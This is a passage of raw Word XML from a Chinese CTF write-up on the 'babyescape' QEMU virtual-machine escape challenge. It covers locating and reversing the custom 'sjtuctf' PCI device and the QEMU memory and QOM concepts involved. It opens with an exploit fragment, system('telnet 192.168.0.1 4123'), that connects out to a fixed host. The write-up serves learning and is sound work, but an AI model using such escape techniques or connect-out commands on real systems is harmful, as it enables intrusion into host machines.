          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DF5000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>'telnet 192.168.0.1 4123'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED063E9" w14:textId="7ED84DBC" w:rsidR="006C0701" w:rsidRPr="00AB1028" w:rsidRDefault="006C0701" w:rsidP="00AB1028">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B95AF20" w14:textId="77777777" w:rsidR="006C0701" w:rsidRPr="00F20E2F" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="086C0B10" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F10D46" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41971391" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD6730C" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D08773D" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D33DDE" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF95E44" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BA230C5" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6835B5C7" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8B86AE" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BAB6EC" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFF93F0" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60994340" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476D169E" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69215FA9" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADB5A92" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2E5A99" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695664F7" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05FC569B" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B2BC4A" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A41D03" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B92B818" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3062C983" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="006C0701">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602E68AC" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="00092160">
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA845FB" w14:textId="71B9C6FD" w:rsidR="00526CD9" w:rsidRPr="00526CD9" w:rsidRDefault="00946AE4" w:rsidP="00092160">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>虚拟机逃逸漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0644B764" w14:textId="0854B39C" w:rsidR="00526CD9" w:rsidRDefault="009A21E9" w:rsidP="00526CD9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="009A21E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本</w:t>
      </w:r>
      <w:r w:rsidR="004B462E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>章</w:t>
      </w:r>
      <w:r w:rsidR="00946AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">讲述我们完成 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00946AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>babyescape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00946AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 题目的过程，涉及 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00946AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00946AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中 PCI 设备注册、内存管理</w:t>
      </w:r>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转换</w:t>
      </w:r>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等知识点</w:t>
      </w:r>
      <w:r w:rsidR="004B462E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模拟出来的guest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的物理地址。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程所使用的虚拟地址。通常</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一大块内存，内存的起始处即为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的零地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1894EEEA" w14:textId="77777777" w:rsidR="00FE0B7E" w:rsidRPr="00526CD9" w:rsidRDefault="00FE0B7E" w:rsidP="00526CD9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01536754" w14:textId="77777777" w:rsidR="00F86C7F" w:rsidRPr="00F86C7F" w:rsidRDefault="00F86C7F" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487D6E1B" w14:textId="5776BD92" w:rsidR="004B462E" w:rsidRPr="00526CD9" w:rsidRDefault="00092160" w:rsidP="00F86C7F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E072A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>定位</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sjtuctf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 设备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F5CDAF" w14:textId="12D63B84" w:rsidR="00526CD9" w:rsidRPr="00FE0B7E" w:rsidRDefault="00360713" w:rsidP="00FE0B7E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从启动参数里可以看到，题目注册了名称为 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sjtuctf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的外设。</w:t>
      </w:r>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ida</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 反编译 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 二进制，搜索函数名包含 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sjtu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的有关函数，得到 8 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FE0B7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有关函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D1797C" w14:textId="536834FD" w:rsidR="00360713" w:rsidRDefault="00FE0B7E" w:rsidP="00FE0B7E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE0B7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E2B3288" wp14:editId="2F4E9657">
            <wp:extent cx="1848160" cy="1020500"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="144036282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t="26314"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1863456" cy="1028946"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00360713">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DB117B4" wp14:editId="4F087869">
            <wp:extent cx="2027583" cy="1056628"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18689001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900163" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2039858" cy="1063025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA375A" w14:textId="61C6AF0A" w:rsidR="00360713" w:rsidRDefault="00360713" w:rsidP="00FE0B7E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这些函数的函数名与 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 官方提供的样例驱动 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edu.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 十分类似。基本可以判断这道题就是围绕 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sjtuctf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的设备驱动展开的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B068F" w14:textId="77777777" w:rsidR="00FE0B7E" w:rsidRDefault="00FE0B7E" w:rsidP="00FE0B7E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1339DFAC" w14:textId="248E11B8" w:rsidR="00526CD9" w:rsidRDefault="00E072A4" w:rsidP="00526CD9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>逆向设备注册逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4373F763" w14:textId="27E441D1" w:rsidR="00DC2DF8" w:rsidRPr="00DC2DF8" w:rsidRDefault="00E072A4" w:rsidP="000C25F4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通过定义一个继承 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PCIDevice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00711544">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 类的对象来注册一个新的 PCI 设备。由于 C 不是面向对象的语言，</w:t>
      </w:r>
      <w:r w:rsidR="00DC2DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该对象通过 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC2DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC2DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的</w:t>
      </w:r>
      <w:r w:rsidR="00711544">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存模型</w:t>
      </w:r>
      <w:r w:rsidR="00DC2DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>QOM来完成定义。</w:t>
      </w:r>
      <w:r w:rsidR="00711544">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在 QOM 中，约定</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00711544">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class_init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00711544">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 负责初始化静态成员变量，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00711544">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>instance_init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00711544">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 负责初始化实例的成员变量</w:t>
      </w:r>
      <w:r w:rsidR="00DC2DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00711544">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似C++/Java 中的static。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>驱动通过回</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调函数向</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qemu</w:t>
